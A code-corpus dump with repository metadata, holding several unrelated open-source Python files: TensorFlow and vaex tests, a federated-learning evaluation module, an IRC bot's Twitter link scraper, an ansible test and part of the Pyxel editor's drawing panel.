        "InceptionV3/Mixed_6a": 1153920,
        "InceptionV3/Mixed_6b": 1298944,
        "InceptionV3/Mixed_6c": 1692736,
        "InceptionV3/Mixed_6d": 1692736,
        "InceptionV3/Mixed_6e": 2143872,
        "InceptionV3/Mixed_7a": 1699584,
        "InceptionV3/Mixed_7b": 5047872,
        "InceptionV3/Mixed_7c": 6080064,
    }
    self.assertDictEqual(expected_param_counts, param_counts)
  def _assertCollectionSize(self, expected_size, collection):
    # Helper: fail with a readable message when a graph collection's size
    # differs from what the build configuration should produce.
    actual_size = len(tf.get_collection(collection))
    if expected_size != actual_size:
      self.fail("Found %d items in collection %s (expected %d)." %
                (actual_size, collection, expected_size))
  def testTrainableTrueIsTrainingTrue(self):
    # Trainable + training: variables are trainable and batch-norm
    # update ops plus regularization losses are registered.
    embeddings = image_embedding.inception_v3(
        self._images, trainable=True, is_training=True)
    self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
    self._verifyParameterCounts()
    self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
    self._assertCollectionSize(188, tf.GraphKeys.TRAINABLE_VARIABLES)
    self._assertCollectionSize(188, tf.GraphKeys.UPDATE_OPS)
    self._assertCollectionSize(94, tf.GraphKeys.REGULARIZATION_LOSSES)
    self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
    self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
  def testTrainableTrueIsTrainingFalse(self):
    # Trainable + inference: no batch-norm update ops.
    embeddings = image_embedding.inception_v3(
        self._images, trainable=True, is_training=False)
    self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
    self._verifyParameterCounts()
    self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
    self._assertCollectionSize(188, tf.GraphKeys.TRAINABLE_VARIABLES)
    self._assertCollectionSize(0, tf.GraphKeys.UPDATE_OPS)
    self._assertCollectionSize(94, tf.GraphKeys.REGULARIZATION_LOSSES)
    self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
    self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
  def testTrainableFalseIsTrainingTrue(self):
    # Frozen tower: no trainable variables, updates, or regularizers.
    embeddings = image_embedding.inception_v3(
        self._images, trainable=False, is_training=True)
    self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
    self._verifyParameterCounts()
    self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
    self._assertCollectionSize(0, tf.GraphKeys.TRAINABLE_VARIABLES)
    self._assertCollectionSize(0, tf.GraphKeys.UPDATE_OPS)
    self._assertCollectionSize(0, tf.GraphKeys.REGULARIZATION_LOSSES)
    self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
    self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
  def testTrainableFalseIsTrainingFalse(self):
    # Frozen tower at inference time: same collection profile as above.
    embeddings = image_embedding.inception_v3(
        self._images, trainable=False, is_training=False)
    self.assertEqual([self._batch_size, 2048], embeddings.get_shape().as_list())
    self._verifyParameterCounts()
    self._assertCollectionSize(376, tf.GraphKeys.GLOBAL_VARIABLES)
    self._assertCollectionSize(0, tf.GraphKeys.TRAINABLE_VARIABLES)
    self._assertCollectionSize(0, tf.GraphKeys.UPDATE_OPS)
    self._assertCollectionSize(0, tf.GraphKeys.REGULARIZATION_LOSSES)
    self._assertCollectionSize(0, tf.GraphKeys.LOSSES)
    self._assertCollectionSize(23, tf.GraphKeys.SUMMARIES)
if __name__ == "__main__":
tf.test.main()
| 43.551471 | 84 | 0.682087 |
acdfbeb9b136bb32011ef95e951f79ef06624377 | 5,199 | py | Python | ocddetection/learning/centralized/evaluation/__init__.py | Lando-L/ocd-detection | 7b74e0c74070ec18df67d31631d2da8b76190846 | [
"MIT"
] | 1 | 2021-06-21T13:16:12.000Z | 2021-06-21T13:16:12.000Z | ocddetection/learning/centralized/evaluation/__init__.py | Lando-L/ocd-detection | 7b74e0c74070ec18df67d31631d2da8b76190846 | [
"MIT"
] | null | null | null | ocddetection/learning/centralized/evaluation/__init__.py | Lando-L/ocd-detection | 7b74e0c74070ec18df67d31631d2da8b76190846 | [
"MIT"
] | null | null | null | from collections import namedtuple
from functools import partial, reduce
import os
from typing import Iterable, List, Tuple
import matplotlib.pylab as plt
import mlflow
import numpy as np
import pandas as pd
import seaborn as sns
import tensorflow as tf
from ocddetection import losses, metrics, models
from ocddetection.data import preprocessing, SENSORS
# Hyper-parameter bundle for one centralized evaluation run: dataset path,
# SGD learning rate, epoch/batch sizes, sliding-window length, positive-class
# loss weight, and model capacity (hidden size, dropout).
Config = namedtuple(
    'Config',
    ['path', 'learning_rate', 'epochs', 'batch_size', 'window_size', 'pos_weight', 'hidden_size', 'dropout']
)
def __load_data(path, window_size, batch_size) -> Iterable[Tuple[tf.data.Dataset, tf.data.Dataset, tf.data.Dataset]]:
    """Yield one (train, val, test) dataset triple per validation fold.

    For each fold 1..4, ADL run *fold* of every subject becomes the
    validation split and run 5 of every subject is always held out for
    test; the remaining runs form the training split.
    """
    subjects = list(range(1, 5))
    runs = list(range(1, 6))
    for fold in range(1, 5):
        paths = [
            os.path.join(path, f'S{subject}-ADL{run}-AUGMENTED.csv')
            for subject in subjects
            for run in runs
        ]
        files = pd.Series(
            paths,
            index=pd.MultiIndex.from_product([subjects, runs]),
            name='path'
        )
        train_files, val_files, test_files = preprocessing.split(
            files,
            validation=[(subject, fold) for subject in subjects],
            test=[(subject, 5) for subject in subjects]
        )
        train = preprocessing.to_centralised(train_files, window_size, batch_size)
        val = preprocessing.to_centralised(val_files, window_size, batch_size)
        test = preprocessing.to_centralised(test_files, window_size, batch_size)
        yield train, val, test
def __model_fn(window_size: int, hidden_size: int, dropout: float) -> tf.keras.Model:
    """Build the bidirectional model sized for the available sensor channels."""
    model = models.bidirectional(window_size, len(SENSORS), hidden_size, dropout)
    return model
def __metrics_fn() -> List[tf.keras.metrics.Metric]:
    """Return PR-AUC plus thresholded precision/recall metrics over logits."""
    # 200 evenly spaced decision thresholds in [0, 1).
    cutoffs = list(np.linspace(0, 1, 200, endpoint=False))
    auc = metrics.AUC(from_logits=True, curve='PR', name='auc')
    precision = metrics.Precision(from_logits=True, thresholds=cutoffs, name='precision')
    recall = metrics.Recall(from_logits=True, thresholds=cutoffs, name='recall')
    return [auc, precision, recall]
def __optimizer_fn(learning_rate: float) -> tf.keras.optimizers.Optimizer:
    """Create the SGD optimizer (momentum 0.9) used for centralized training."""
    return tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9)
def __train_step(
    X: tf.Tensor,
    y: tf.Tensor,
    model: tf.keras.Model,
    optimizer: tf.keras.optimizers.Optimizer,
    loss_fn: tf.keras.losses.Loss
) -> None:
    """Run one gradient-descent step of *model* on a single (X, y) batch."""
    with tf.GradientTape() as tape:
        loss_value = loss_fn(y, model(X, training=True))
    # Gradients can be requested after the tape context has exited.
    gradients = tape.gradient(loss_value, model.trainable_variables)
    optimizer.apply_gradients(zip(gradients, model.trainable_variables))
def __validation_step(
    state: tf.Tensor,
    batch: Tuple[tf.Tensor, tf.Tensor],
    model: tf.keras.Model,
    metrics: List[tf.keras.metrics.Metric]
) -> tf.Tensor:
    """Reduce step for validation: update *metrics* in place and return the
    running 2x2 confusion matrix accumulated into *state*."""
    logits = model(batch[0], training=False)
    y_true = tf.reshape(batch[1], (-1,))
    # Binarize the logits at 0.5 after the sigmoid for the confusion matrix.
    y_pred = tf.round(tf.nn.sigmoid(tf.reshape(logits, (-1,))))
    for metric in metrics:
        metric.update_state(batch[1], logits)
    return state + tf.math.confusion_matrix(y_true, y_pred, num_classes=2)
def run(experiment_name: str, run_name: str, config: Config) -> None:
    """Train and evaluate the centralized model over the 4 cross-validation
    folds, logging parameters, metrics and figures to MLflow."""
    mlflow.set_experiment(experiment_name)
    with mlflow.start_run(run_name=run_name):
        mlflow.log_params(config._asdict())
        def reduce_fn(state, data):
            # One fold: fresh model/optimizer; `data` is (train, val, test).
            model = __model_fn(config.window_size, config.hidden_size, config.dropout)
            loss_fn = losses.WeightedBinaryCrossEntropy(config.pos_weight)
            optimizer = __optimizer_fn(config.learning_rate)
            input_spec = (
                tf.TensorSpec((None, config.window_size, len(SENSORS)), dtype=tf.float32),
                tf.TensorSpec((None, 1), dtype=tf.float32)
            )
            # Compile the train step once per fold with a fixed input signature.
            train_step = tf.function(
                partial(__train_step, model=model, optimizer=optimizer, loss_fn=loss_fn),
                input_signature=input_spec
            )
            val_state = tf.zeros((2, 2), dtype=tf.int32)
            val_metrics = __metrics_fn()
            val_step = partial(__validation_step, model=model, metrics=val_metrics)
            for _ in range(1, config.epochs + 1):
                for X, y in data[0]:
                    train_step(X, y)
            # Validation pass: fold the confusion matrix over the val dataset.
            confusion_matrix = data[1].reduce(val_state, val_step)
            auc = val_metrics[0].result().numpy()
            precision = val_metrics[1].result().numpy()
            recall = val_metrics[2].result().numpy()
            # Accumulate per-fold results into the running state tuple.
            return (
                state[0] + confusion_matrix,
                state[1] + [auc],
                state[2] + [precision],
                state[3] + [recall]
            )
        confusion_matrix, auc, precision, recall = reduce(
            reduce_fn,
            __load_data(config.path, config.window_size, config.batch_size),
            (
                tf.zeros((2, 2), dtype=tf.int32),
                [],
                [],
                []
            )
        )
        # Confusion matrix
        fig, ax = plt.subplots(figsize=(16, 8))
        sns.heatmap(confusion_matrix, annot=True, fmt='d', cmap=sns.color_palette("Blues"), ax=ax)
        ax.set_xlabel('Predicted')
        ax.set_ylabel('Ground Truth')
        mlflow.log_figure(fig, 'confusion_matrix.png')
        plt.close(fig)
        # AUC
        mlflow.log_metric('val_auc', np.mean(auc))
        # Precision Recall
        fig, ax = plt.subplots(figsize=(16, 8))
        sns.lineplot(x=np.mean(recall, axis=0), y=np.mean(precision, axis=0), ax=ax)
        ax.set_xlabel('Recall')
        ax.set_xlim(0., 1.)
        ax.set_ylabel('Precision')
        ax.set_ylim(0., 1.)
        mlflow.log_figure(fig, 'precision_recall.png')
        plt.close(fig)
| 29.539773 | 117 | 0.677053 |
acdfbf883c0fb76c51183f938137876276c5994f | 2,354 | py | Python | michiru/modules/uribot/twitter.py | moeIO/michiru | f1bafb90c2d82debee9e0402b426eba592038f24 | [
"WTFPL"
] | 1 | 2018-01-25T15:39:12.000Z | 2018-01-25T15:39:12.000Z | michiru/modules/uribot/twitter.py | moeIO/michiru | f1bafb90c2d82debee9e0402b426eba592038f24 | [
"WTFPL"
] | null | null | null | michiru/modules/uribot/twitter.py | moeIO/michiru | f1bafb90c2d82debee9e0402b426eba592038f24 | [
"WTFPL"
] | null | null | null | # URI title bot - Twitter module.
import re
import bs4
from michiru import config, modules
## Module information.
__name__ = 'uribot.twitter'
__author__ = 'Shiz'
__license__ = 'WTFPL'
__desc__ = 'Gives URL information for Twitter links.'
__deps__ = ['uribot']
URI_REGEXP = re.compile(r'^https?://(?:www\.){0,1}twitter\.com/([a-zA-Z0-9_-]+)/status/([0-9]+)(?:[?#&]\S*)?$')
## Module.
def uri_twitter(bot, response, matches):
    """Extract Twitter status information.

    Scrapes the tweet permalink page in *response* and returns a
    ``(title, tweet_text, metadata)`` tuple, where metadata lists the
    retweet/like counts when present on the page.
    """
    html = bs4.BeautifulSoup(response.text)
    # Extract tweet and strip HTML.
    tweet = ''.join(html.find('div', class_='permalink-tweet-container').find('p', class_='tweet-text').find_all(text=True))
    # Extract user.
    user = html.find('div', class_='permalink-tweet-container').find('div', class_='tweet')['data-name']
    # Try to extract metadata. The stats block is absent on tweets without any
    # retweets/likes, so treat a failed lookup as "no data". Narrowed the
    # original bare `except:` so KeyboardInterrupt/SystemExit are not swallowed.
    try:
        retweets = html.find('ul', class_='stats').find('li', class_='js-stat-retweets').strong.string
    except Exception:
        retweets = None
    try:
        likes = html.find('ul', class_='stats').find('li', class_='js-stat-favorites').strong.string
    except Exception:
        likes = None
    # Extract images: replace pic.twitter.com / t.co placeholders in the tweet
    # text with the real image URLs, or append the URL if no placeholder exists.
    images = html.find_all('meta', property='og:image')
    for image in images:
        url = image['content']
        if url.count(':') > 1:
            url = url.rsplit(':', maxsplit=1)[0]
        if 'profile_images' in url:
            continue
        if re.search(r'(?:https?://)?pic\.twitter\.com/[a-zA-Z0-9_-]+', tweet):
            tweet = re.sub(r'(?:https?://)?pic\.twitter\.com/[a-zA-Z0-9_-]+', url, tweet)
        elif re.search(r'(?:https?://)t\.co/[a-zA-Z0-9_-]+', tweet):
            tweet = re.sub(r'(?:https?://)t\.co/[a-zA-Z0-9_-]+', url, tweet)
        else:
            tweet += ' ' + url
    # Un-cramp URLs.
    tweet = re.sub(r'(?!\s+)http(s?):', r' http\1:', tweet)
    # Post-process tweet a bit.
    tweet = re.sub(r'\s+', ' ', tweet).strip()
    # Build metadata.
    meta = []
    if retweets:
        meta.append('↻ ' + retweets)
    if likes:
        meta.append('♥ ' + likes)
    return 'Twitter: {}'.format(user), tweet, ', '.join(meta)
def load():
    """Register the Twitter URL handler in uribot's dispatch table."""
    from michiru.modules import uribot
    handler_entry = {
        'handler': uri_twitter,
    }
    uribot.URI_HANDLERS[URI_REGEXP] = handler_entry
def unload():
    """Remove the Twitter URL handler from uribot's dispatch table."""
    from michiru.modules import uribot
    # pop() without a default raises KeyError on a missing key, same as `del`.
    uribot.URI_HANDLERS.pop(URI_REGEXP)
| 30.179487 | 124 | 0.584962 |
acdfc0710328cda7bc1a76726f8d0450b062c066 | 210 | py | Python | data/external/repositories/139781/ndsb-master/caffe-dev/python/caffe/__init__.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | null | null | null | data/external/repositories/139781/ndsb-master/caffe-dev/python/caffe/__init__.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | null | null | null | data/external/repositories/139781/ndsb-master/caffe-dev/python/caffe/__init__.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | 1 | 2019-12-04T08:23:33.000Z | 2019-12-04T08:23:33.000Z | from .pycaffe import Net, SGDSolver
from ._caffe import set_mode_cpu, set_mode_gpu, set_device, \
set_phase_train, set_phase_test
from .classifier import Classifier
from .detector import Detector
import io
| 30 | 61 | 0.819048 |
acdfc0bb1cf2bf0174bf9d3aef5cf9c5e8677eff | 997 | py | Python | tests/astype_test.py | rishi1111/vaex | b3516201d04e9277b8918dadab9df33a7c83c01a | [
"MIT"
] | 1 | 2020-11-27T08:49:18.000Z | 2020-11-27T08:49:18.000Z | tests/astype_test.py | rishi1111/vaex | b3516201d04e9277b8918dadab9df33a7c83c01a | [
"MIT"
] | null | null | null | tests/astype_test.py | rishi1111/vaex | b3516201d04e9277b8918dadab9df33a7c83c01a | [
"MIT"
] | null | null | null | from common import *
import collections
import numpy as np
def test_astype(ds_local):
    """Casting a column to float32 should change both dtype and values consistently."""
    ds = ds_local
    ds_original = ds.copy()
    #ds.columns['x'] = (ds.columns['x']*1).copy() # convert non non-big endian for now
    ds['x'] = ds['x'].astype('f4')
    assert ds.x.evaluate().dtype == np.float32
    # Values must match a plain numpy astype of the original column.
    assert ds.x.tolist() == ds_original.x.as_numpy().evaluate().astype(np.float32).tolist()
def test_astype_str():
    """Strings with thousands separators can be cleaned, then cast float -> int64."""
    df = vaex.from_arrays(x=['10,010', '-50,0', '11,111'])
    df['x'] = df['x'].str.replace(',', '').evaluate()
    df['x'] = (df['x'].astype('float')).astype('int64').evaluate()
    assert df.columns['x'].dtype == np.int64
    assert df.x.dtype == np.int64
def test_astype_dtype():
    """Casting to str should produce an Arrow (large_)string data type, even with NaN."""
    df = vaex.from_arrays(x=[0, 1])
    assert df.x.astype(str).data_type() in [pa.string(), pa.large_string()]
    df = vaex.from_arrays(x=[np.nan, 1])
    # assert df.x.astype(str).dtype == vaex.column.str_type
    assert df.x.astype(str).data_type() in [pa.string(), pa.large_string()]
acdfc16cc7fdb2a278df751614c80755caa00938 | 1,144 | py | Python | intro_types.py | ericauuu/data_types | 6efd000e3239b7b3a17d5c90ee5e67f4740c3f82 | [
"MIT"
] | null | null | null | intro_types.py | ericauuu/data_types | 6efd000e3239b7b3a17d5c90ee5e67f4740c3f82 | [
"MIT"
] | null | null | null | intro_types.py | ericauuu/data_types | 6efd000e3239b7b3a17d5c90ee5e67f4740c3f82 | [
"MIT"
] | null | null | null | """
Let's learn about Python types!
"""
import json  # standard-library JSON parser

# Load the raw search-results payload from disk.
with open("raw_data/data.json", "r") as json_file:
    text = json_file.read()
data = json.loads(text)
main_keys = data.keys()
# Fixed typo in the printed message: "he main keys" -> "The main keys".
print(f"The main keys are: {main_keys}")
language_code = data['LanguageCode']
print(language_code)
# Renamed from the misspelled `searh_parameters`.
search_parameters = data['SearchParameters']
print(search_parameters)
search_result = data['SearchResult']
#print(search_result)
search_result_keys = search_result.keys()
print(f"The search_result keys are: {search_result_keys}")
search_result_count = search_result['SearchResultCount']
print(search_result_count)
search_result_count_all = search_result['SearchResultCountAll']
print(search_result_count_all)
search_result_items = search_result['SearchResultItems']
print(search_result_items)
test_item = search_result_items[0]
print(f"""test_item contains {test_item} and is of type {type(test_item)}""")
print(len(search_result_items))
list_of_types = [type(item)
                 for item in search_result_items]
print(list_of_types)
unique_types = set(list_of_types)
print(f"The unique types in list_of_types is: {unique_types}")
acdfc1f7aafcae564f6e0182c1a6dd51cdeb339f | 402 | py | Python | molecule/default/tests/test_ius_repo.py | rmachuca89/ansible-ius-repo | 45cdd37b076119f2895cd6b8fc27f62e619c17f1 | [
"Apache-2.0"
] | null | null | null | molecule/default/tests/test_ius_repo.py | rmachuca89/ansible-ius-repo | 45cdd37b076119f2895cd6b8fc27f62e619c17f1 | [
"Apache-2.0"
] | null | null | null | molecule/default/tests/test_ius_repo.py | rmachuca89/ansible-ius-repo | 45cdd37b076119f2895cd6b8fc27f62e619c17f1 | [
"Apache-2.0"
] | null | null | null | """IUS repo testinfra tests."""
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_ius_repo_installed(host):
    """Test package is installed."""
    # `host` is the testinfra connection fixture for each target machine.
    ius_repo = host.package('ius-release')
    assert ius_repo.is_installed
    # assert ius_repo.version.startswith("")
| 25.125 | 63 | 0.748756 |
acdfc390ae55177c514383c90a96a5acb5723636 | 13,457 | py | Python | pyxel/editor/drawing_panel.py | JUNE-9653/pyxel | 2d0c828757ea0183cfca526f78d0d72ae4b76753 | [
"MIT"
] | 1 | 2019-07-13T01:46:45.000Z | 2019-07-13T01:46:45.000Z | pyxel/editor/drawing_panel.py | JUNE-9653/pyxel | 2d0c828757ea0183cfca526f78d0d72ae4b76753 | [
"MIT"
] | null | null | null | pyxel/editor/drawing_panel.py | JUNE-9653/pyxel | 2d0c828757ea0183cfca526f78d0d72ae4b76753 | [
"MIT"
] | null | null | null | import pyxel
from pyxel.ui import ScrollBar, Widget
from pyxel.ui.constants import WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME
from .constants import (
TOOL_BUCKET,
TOOL_CIRC,
TOOL_CIRCB,
TOOL_PENCIL,
TOOL_RECT,
TOOL_RECTB,
TOOL_SELECT,
)
from .overlay_canvas import OverlayCanvas
class DrawingPanel(Widget):
    """16x16-cell drawing canvas for Pyxel's image/tilemap editor.

    Shows a scrollable viewport into the edited image or tilemap. Tool
    strokes are drawn on an overlay canvas and committed to the real data
    on mouse release, with before/after snapshots pushed to undo history.
    """
    def __init__(self, parent, *, is_tilemap_mode):
        """Set up widget geometry, tool state, scroll bars and event handlers."""
        super().__init__(parent, 11, 16, 130, 130)
        self._is_tilemap_mode = is_tilemap_mode
        self._history_data = None
        self.viewport_x = 0
        self.viewport_y = 0
        self._press_x = 0
        self._press_y = 0
        self._last_x = 0
        self._last_y = 0
        self._drag_offset_x = 0
        self._drag_offset_y = 0
        self._select_x1 = 0
        self._select_y1 = 0
        self._select_x2 = 0
        self._select_y2 = 0
        self._copy_buffer = None
        self._is_dragged = False
        self._is_assist_mode = False
        self._overlay_canvas = OverlayCanvas()
        self._h_scroll_bar = ScrollBar(
            self, 11, 145, 130, ScrollBar.HORIZONTAL, 32, 2, 0
        )
        self._v_scroll_bar = ScrollBar(self, 140, 16, 130, ScrollBar.VERTICAL, 32, 2, 0)
        self.add_event_handler("mouse_down", self.__on_mouse_down)
        self.add_event_handler("mouse_up", self.__on_mouse_up)
        self.add_event_handler("mouse_click", self.__on_mouse_click)
        self.add_event_handler("mouse_drag", self.__on_mouse_drag)
        self.add_event_handler("mouse_hover", self.__on_mouse_hover)
        self.add_event_handler("update", self.__on_update)
        self.add_event_handler("draw", self.__on_draw)
        self._h_scroll_bar.add_event_handler("change", self.__on_h_scroll_bar_change)
        self._v_scroll_bar.add_event_handler("change", self.__on_v_scroll_bar_change)
    def _add_pre_history(self, canvas):
        """Snapshot the 16x16 destination region before an edit."""
        self._history_data = data = {}
        if self._is_tilemap_mode:
            data["tilemap"] = self.parent.tilemap
        else:
            data["image"] = self.parent.image
        data["pos"] = (self.viewport_x, self.viewport_y)
        data["before"] = canvas.copy()
    def _add_post_history(self, canvas):
        """Snapshot after the edit; push to undo history only if data changed."""
        data = self._history_data
        data["after"] = canvas.copy()
        if (data["before"] != data["after"]).any():
            self.parent.add_history(data)
    def _screen_to_view(self, x, y):
        """Convert screen pixels to clamped 0..15 cell coordinates in the view."""
        x = min(max((x - self.x - 1) // 8, 0), 15)
        y = min(max((y - self.y - 1) // 8, 0), 15)
        return x, y
    def __on_mouse_down(self, key, x, y):
        """Begin a stroke/selection, or flood-fill immediately for the bucket."""
        if key != pyxel.MOUSE_LEFT_BUTTON:
            return
        x, y = self._screen_to_view(x, y)
        self._press_x = x
        self._press_y = y
        self._is_dragged = True
        self._is_assist_mode = False
        if self.parent.tool == TOOL_SELECT:
            self._select_x1 = self._select_x2 = x
            self._select_y1 = self._select_y2 = y
        elif TOOL_PENCIL <= self.parent.tool <= TOOL_CIRC:
            self._overlay_canvas.pix(x, y, self.parent.color)
        elif self.parent.tool == TOOL_BUCKET:
            data = (
                pyxel.tilemap(self.parent.tilemap).data
                if self._is_tilemap_mode
                else pyxel.image(self.parent.image).data
            )
            dest = data[
                self.viewport_y : self.viewport_y + 16,
                self.viewport_x : self.viewport_x + 16,
            ]
            self._add_pre_history(dest)
            self._overlay_canvas.fill(x, y, self.parent.color, dest)
            self._add_post_history(dest)
        self._last_x = x
        self._last_y = y
    def __on_mouse_up(self, key, x, y):
        """Commit the overlay canvas into the target data and record history."""
        if key != pyxel.MOUSE_LEFT_BUTTON:
            return
        self._is_dragged = False
        if TOOL_PENCIL <= self.parent.tool <= TOOL_CIRC:
            data = (
                pyxel.tilemap(self.parent.tilemap).data
                if self._is_tilemap_mode
                else pyxel.image(self.parent.image).data
            )
            dest = data[
                self.viewport_y : self.viewport_y + 16,
                self.viewport_x : self.viewport_x + 16,
            ]
            self._add_pre_history(dest)
            # Only cells actually drawn on the overlay are written back.
            index = self._overlay_canvas.data != OverlayCanvas.COLOR_NONE
            dest[index] = self._overlay_canvas.data[index]
            self._overlay_canvas.clear()
            self._add_post_history(dest)
    def __on_mouse_click(self, key, x, y):
        """Right-click: pick the color/tile under the cursor."""
        if key == pyxel.MOUSE_RIGHT_BUTTON:
            x = self.viewport_x + (x - self.x) // 8
            y = self.viewport_y + (y - self.y) // 8
            if self._is_tilemap_mode:
                self.parent.color = pyxel.tilemap(self.parent.tilemap).data[y, x]
            else:
                self.parent.color = pyxel.image(self.parent.image).data[y, x]
    def __on_mouse_drag(self, key, x, y, dx, dy):
        """Left-drag: extend the current tool stroke; right-drag: pan the viewport."""
        if key == pyxel.MOUSE_LEFT_BUTTON:
            x1 = self._press_x
            y1 = self._press_y
            x2 = (x - self.x - 1) // 8
            y2 = (y - self.y - 1) // 8
            if self.parent.tool == TOOL_SELECT:
                x2 = min(max(x2, 0), 15)
                y2 = min(max(y2, 0), 15)
                self._select_x1, self._select_x2 = (x1, x2) if x1 < x2 else (x2, x1)
                self._select_y1, self._select_y2 = (y1, y2) if y1 < y2 else (y2, y1)
            elif self.parent.tool == TOOL_PENCIL:
                if self._is_assist_mode:
                    # Assist mode: the pencil draws one straight line from the press point.
                    self._overlay_canvas.clear()
                    self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
                else:
                    self._overlay_canvas.line(
                        self._last_x, self._last_y, x2, y2, self.parent.color
                    )
            elif self.parent.tool == TOOL_RECTB:
                self._overlay_canvas.clear()
                self._overlay_canvas.rectb(
                    x1, y1, x2, y2, self.parent.color, self._is_assist_mode
                )
            elif self.parent.tool == TOOL_RECT:
                self._overlay_canvas.clear()
                self._overlay_canvas.rect(
                    x1, y1, x2, y2, self.parent.color, self._is_assist_mode
                )
            elif self.parent.tool == TOOL_CIRCB:
                self._overlay_canvas.clear()
                self._overlay_canvas.circb(
                    x1, y1, x2, y2, self.parent.color, self._is_assist_mode
                )
            elif self.parent.tool == TOOL_CIRC:
                self._overlay_canvas.clear()
                self._overlay_canvas.circ(
                    x1, y1, x2, y2, self.parent.color, self._is_assist_mode
                )
            self._last_x = x2
            self._last_y = y2
        elif key == pyxel.MOUSE_RIGHT_BUTTON:
            # Pan in 8-pixel steps once 16 pixels of drag have accumulated.
            self._drag_offset_x -= dx
            self._drag_offset_y -= dy
            if abs(self._drag_offset_x) >= 16:
                offset = self._drag_offset_x // 16
                self.viewport_x += offset * 8
                self._drag_offset_x -= offset * 16
            if abs(self._drag_offset_y) >= 16:
                offset = self._drag_offset_y // 16
                self.viewport_y += offset * 8
                self._drag_offset_y -= offset * 16
            self.viewport_x = min(max(self.viewport_x, 0), 240)
            self.viewport_y = min(max(self.viewport_y, 0), 240)
    def __on_mouse_hover(self, x, y):
        """Show a context-sensitive help message with the hovered cell position."""
        if self.parent.tool == TOOL_SELECT:
            s = "COPY:CTRL+C PASTE:CTRL+V"
        elif self._is_dragged:
            s = "ASSIST:SHIFT"
        else:
            s = "PICK:R-CLICK VIEW:R-DRAG"
        x, y = self._screen_to_view(x, y)
        x += self.viewport_x
        y += self.viewport_y
        self.parent.help_message = s + " ({},{})".format(x, y)
    def __on_update(self):
        """Per-frame: handle shift assist mode, copy/paste and arrow-key panning."""
        if self._is_dragged and not self._is_assist_mode and pyxel.btn(pyxel.KEY_SHIFT):
            # Entering assist mode mid-drag redraws the stroke as a perfect shape.
            self._is_assist_mode = True
            x1 = self._press_x
            y1 = self._press_y
            x2 = self._last_x
            y2 = self._last_y
            if self.parent.tool == TOOL_PENCIL:
                self._overlay_canvas.clear()
                self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
            elif self.parent.tool == TOOL_RECTB:
                self._overlay_canvas.clear()
                self._overlay_canvas.rectb(x1, y1, x2, y2, self.parent.color, True)
            elif self.parent.tool == TOOL_RECT:
                self._overlay_canvas.clear()
                self._overlay_canvas.rect(x1, y1, x2, y2, self.parent.color, True)
            elif self.parent.tool == TOOL_CIRCB:
                self._overlay_canvas.clear()
                self._overlay_canvas.circb(x1, y1, x2, y2, self.parent.color, True)
            elif self.parent.tool == TOOL_CIRC:
                self._overlay_canvas.clear()
                self._overlay_canvas.circ(x1, y1, x2, y2, self.parent.color, True)
        if (
            self.parent.tool == TOOL_SELECT
            and self._select_x1 >= 0
            and pyxel.btn(pyxel.KEY_CONTROL)
        ):
            if pyxel.btnp(pyxel.KEY_C):
                # Copy the selected region into the clipboard buffer.
                if self._is_tilemap_mode:
                    data = pyxel.tilemap(self.parent.tilemap).data
                else:
                    data = pyxel.image(self.parent.image).data
                src = data[
                    self.viewport_y
                    + self._select_y1 : self.viewport_y
                    + self._select_y2
                    + 1,
                    self.viewport_x
                    + self._select_x1 : self.viewport_x
                    + self._select_x2
                    + 1,
                ]
                self._copy_buffer = src.copy()
            elif self._copy_buffer is not None and pyxel.btnp(pyxel.KEY_V):
                # Paste at the selection origin, clipping to the 16x16 view.
                x1 = self.viewport_x + self._select_x1
                y1 = self.viewport_y + self._select_y1
                height, width = self._copy_buffer.shape
                width -= max(self._select_x1 + width - 16, 0)
                height -= max(self._select_y1 + height - 16, 0)
                if self._is_tilemap_mode:
                    data = pyxel.tilemap(self.parent.tilemap).data
                else:
                    data = pyxel.image(self.parent.image).data
                dest = data[y1 : y1 + height, x1 : x1 + width]
                dest[:, :] = self._copy_buffer[:height, :width]
        if (
            pyxel.btn(pyxel.KEY_SHIFT)
            or pyxel.btn(pyxel.KEY_CONTROL)
            or pyxel.btn(pyxel.KEY_ALT)
        ):
            return
        # Arrow keys pan the viewport in 8-pixel steps (with key repeat).
        if pyxel.btnp(pyxel.KEY_LEFT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
            self.viewport_x -= 8
        if pyxel.btnp(pyxel.KEY_RIGHT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
            self.viewport_x += 8
        if pyxel.btnp(pyxel.KEY_UP, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
            self.viewport_y -= 8
        if pyxel.btnp(pyxel.KEY_DOWN, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
            self.viewport_y += 8
        self.viewport_x = min(max(self.viewport_x, 0), 240)
        self.viewport_y = min(max(self.viewport_y, 0), 240)
        self._h_scroll_bar.value = self.viewport_x // 8
        self._v_scroll_bar.value = self.viewport_y // 8
    def __on_draw(self):
        """Render the viewport, overlay, guide lines and selection rectangle."""
        self.draw_panel(self.x, self.y, self.width, self.height)
        if self._is_tilemap_mode:
            pyxel.bltm(
                self.x + 1,
                self.y + 1,
                self.parent.tilemap,
                self.viewport_x,
                self.viewport_y,
                16,
                16,
            )
